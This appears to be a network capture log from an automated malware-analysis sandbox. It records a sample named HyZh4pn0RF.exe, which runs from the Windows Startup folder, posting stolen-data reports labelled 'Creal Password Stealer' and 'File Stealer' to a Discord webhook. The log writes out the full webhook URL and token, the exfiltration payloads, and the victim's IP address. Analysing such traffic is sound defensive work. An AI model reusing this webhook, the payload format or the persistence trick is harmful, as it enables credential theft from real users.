                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=38e46f0a7cec11efa7c9a6a6d338c935e660db62275a48353f4e5be22d8fbb0e2212ec9bd491b71c4ff50d5dd973be7a; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC347INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 72 75 69 64 3d 65 36 31 63 32 65 38 30 38 34 31 64 36 39 63 38 64 32 32 32 31 66 64 33 32 30 32 30 38 33 37 66 39 34 66 65 30 65 66 37 2d 31 37 32 37 34 35 33 39 34 38 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 45 52 5a 66 51 4b 6d 6b 4e 74 72 76 65 52 74 43 48 58 42 4a 6c 5a 33 4d 67 45 70 59 70 45 4a 34 59 42 46 79 35 64 55 4f 38 74 6b 2d 31 37 32 37 34 35 33 39 34 38 30 35 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: __cfruid=e61c2e80841d69c8d2221fd32020837f94fe0ef7-1727453948; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneSet-Cookie: _cfuvid=ERZfQKmkNtrveRtCHXBJlZ3MgEpYpEJ4YBFy5dUO8tk-1727453948051-0.0.1.1-604800000; path=/; domain=.discor
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC79INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 61 74 65 20 6c 69 6d 69 74 65 64 2e 22 2c 20 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 20 30 2e 33 2c 20 22 67 6c 6f 62 61 6c 22 3a 20 66 61 6c 73 65 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "You are being rate limited.", "retry_after": 0.3, "global": false}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                49192.168.2.849763162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 649
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC649OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts**:\n\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> \u2022 **0**
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC1331INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:08 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=38fb081e7cec11efa015ce5421a2957b; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 0
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453951
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 2
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i8qi0QFieyFHr5IzCu7iUGCIMOcleG7k7VWtvX8gM2MWG%2ByJ3KUPvgpsxbCYKMu2yMm7yXI7jR2jA8nECf5LQtaNfoFngVO552bbszKoLCgYRgOMRG1MgjxY7lP5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=38fb081e7cec11efa015ce5421a2957b0482c3917c8f9110c39af5c875593f193ecc1f3171e117b55844e2ef89dcc1f1; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=e61c2e80841d69c8d2221fd32020837f94fe0ef7-1727453948; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 63 75 68 78 6c 6a 34 61 62 43 59 67 50 4b 6e 67 6c 4c 39 68 75 4f 70 57 32 33 57 62 47 4d 63 39 53 45 76 41 49 5a 71 57 58 56 4d 2d 31 37 32 37 34 35 33 39 34 38 32 30 32 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 34 37 65 62 65 64 31 61 34 34 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=cuhxlj4abCYgPKnglL9huOpW23WbGMc9SEvAIZqWXVM-1727453948202-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd047ebed1a44-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                50192.168.2.849765162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 431
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC431OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer | https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC1335INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:08 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=394a31c87cec11ef80916ec6ea4fc16e; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 0
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453951
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 2
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pGEykrVebyMU%2FTzJ10ycn7GWwQAUrymWlSKk%2F70JA%2FlePm5eoVmZU1HHLwgsCm6rrJHYDh3355GH6XcZdT810MgSfr0yw2ZG5I4SaCJxvDNvEsQrKEYPETcTCHiI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=394a31c87cec11ef80916ec6ea4fc16eeb68a171fda8c701c44612801a047c2ff379b8173eabdaf48ef4e3bcc99742c0; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=e61c2e80841d69c8d2221fd32020837f94fe0ef7-1727453948; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 73 78 58 4f 4e 50 62 54 32 54 76 6b 2e 59 71 32 6b 4a 57 53 51 36 73 6d 79 6e 79 59 6c 42 76 63 32 51 46 59 63 4c 4f 39 72 44 6f 2d 31 37 32 37 34 35 33 39 34 38 37 31 39 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 34 62 30 65 34 31 31 38 32 64 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=sxXONPbT2Tvk.Yq2kJWSQ6smynyYlBvc2QFYcLO9rDo-1727453948719-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd04b0e41182d-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                51192.168.2.849764162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 506
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC506OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal | File Stealer"}, "footer": {"text": "Creal Stealer | ht
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC1255INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:08 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 79
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                retry-after: 1803
                                                                                                                                                                                                                                                                                                x-ratelimit-scope: user
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=394a83627cec11ef924672506fccbbd5; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 0
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453951
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 2
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OrPgcQJrMCYTbmvN4BVIlT%2BZ%2B0HHGcPuWujAUUf%2B%2BmHBG650zRMmS402Tne1FpwJlMYEzEIOO1u2JB1nQqyt6cFBD%2Ba4rxsnpiySPjARtxJRBKiRMDyAdI6akul6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=394a83627cec11ef924672506fccbbd5d6909740035859ddfc8c1c677564571ea3c3f000b3eb473738cdbd43d6da4044; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC347INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 72 75 69 64 3d 65 36 31 63 32 65 38 30 38 34 31 64 36 39 63 38 64 32 32 32 31 66 64 33 32 30 32 30 38 33 37 66 39 34 66 65 30 65 66 37 2d 31 37 32 37 34 35 33 39 34 38 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 46 35 69 58 6b 79 44 67 66 44 79 69 5f 77 34 57 30 4e 50 33 55 6e 4b 77 78 64 4e 37 46 68 4b 49 4d 36 35 32 77 49 53 51 5f 58 6b 2d 31 37 32 37 34 35 33 39 34 38 37 32 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: __cfruid=e61c2e80841d69c8d2221fd32020837f94fe0ef7-1727453948; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneSet-Cookie: _cfuvid=F5iXkyDgfDyi_w4W0NP3UnKwxdN7FhKIM652wISQ_Xk-1727453948720-0.0.1.1-604800000; path=/; domain=.discor
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC79INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 61 74 65 20 6c 69 6d 69 74 65 64 2e 22 2c 20 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 20 30 2e 33 2c 20 22 67 6c 6f 62 61 6c 22 3a 20 66 61 6c 73 65 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "You are being rate limited.", "retry_after": 0.3, "global": false}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                52192.168.2.849766162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 649
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC649OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts**:\n\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> \u2022 **0**
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC1251INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:08 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 79
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                retry-after: 1678
                                                                                                                                                                                                                                                                                                x-ratelimit-scope: user
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=395d76667cec11ef9680ae4c9400efeb; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 0
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453951
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 2
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C7FwWHEuHA0ROu3gDo81hPf7BpsuFXhMj%2BrBGvFDtThBriSA7teLHcyN5brcsKJ5s9Ea4Vgs4xw2p94H%2F5Z2wglb%2FfCFESgGqoASgBqEZjSbxZdOS610U41Hfvlg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=395d76667cec11ef9680ae4c9400efeb1554af985a6a1c95b8a86e5605929253f0e955ac538fbe30d64ea6b22550fca0; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC347INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 72 75 69 64 3d 65 36 31 63 32 65 38 30 38 34 31 64 36 39 63 38 64 32 32 32 31 66 64 33 32 30 32 30 38 33 37 66 39 34 66 65 30 65 66 37 2d 31 37 32 37 34 35 33 39 34 38 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 55 67 79 38 6f 2e 59 4d 4c 57 5a 4d 51 76 77 6d 68 4c 41 78 61 36 33 54 6f 7a 59 79 64 57 69 62 6a 35 5f 38 4d 33 78 75 6e 33 6f 2d 31 37 32 37 34 35 33 39 34 38 38 34 35 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: __cfruid=e61c2e80841d69c8d2221fd32020837f94fe0ef7-1727453948; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneSet-Cookie: _cfuvid=Ugy8o.YMLWZMQvwmhLAxa63TozYydWibj5_8M3xun3o-1727453948845-0.0.1.1-604800000; path=/; domain=.discor
